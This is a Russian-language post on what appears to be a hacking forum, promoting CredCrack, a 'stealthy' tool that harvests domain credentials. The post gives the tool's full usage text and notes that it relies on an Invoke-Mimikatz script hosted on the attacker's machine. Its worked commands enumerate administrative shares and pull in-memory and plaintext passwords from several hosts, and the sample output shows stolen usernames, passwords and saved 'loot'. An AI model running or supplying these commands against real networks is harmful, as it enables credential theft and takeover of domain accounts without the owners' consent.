CredCrack - быстрый и скрытый сборщик учетных данных

Борис_бритва

Script Kiddie
21.09.2020
10
0
1
1601363631682.png
CredCrack - быстрый и скрытый сборщик учетных данных. Он рекурсивно извлекает учетные данные в памяти и в открытом виде. По завершении CredCrack проанализирует и выведет учетные данные, идентифицируя всех полученных администраторов домена. CredCrack также имеет возможность перечислять и перечислять доступ к общим ресурсам, и да, он многопоточен!

CredCrack был протестирован и работает с инструментами, изначально присутствующими в Kali Linux. CredCrack полагается исключительно на наличие файла Invoke-Mimikatz.ps1 PowerSploit в каталоге / var / www. Загрузите Invoke-Mimikatz здесь

Использование:
Код:
credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
             [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
Примеры:
Перечисление общего доступа:
Код:
./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.102\ADMIN$
 OPEN      \\192.168.1.102\C$

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.103\ADMIN$
 OPEN      \\192.168.1.103\C$
 CLOSED    \\192.168.1.103\F$

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
 -----------------------------------------------------------------
 
 CLOSED    \\192.168.1.100\ADMIN$
 CLOSED    \\192.168.1.100\C$
 OPEN      \\192.168.1.100\NETLOGON
 OPEN      \\192.168.1.100\SYSVOL

[*] Done! Completed in 0.8s
Сбор учетных данных:
Код:
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\   
                       | /         /   
                       `. ())oo() .     
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       

                
[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s
 

Об LS-LA

  • Мы, группа единомышленников, основная цель которых повышать уровень знаний и умений.
    Не забывая о материальном благополучии каждого)

About LS-LA

  • We, a group of like-minded people, whose main goal is to increase the level of knowledge and skills.
    Not forgetting about everyone’s material well-being)

Быстрая навигация

Пользовательское меню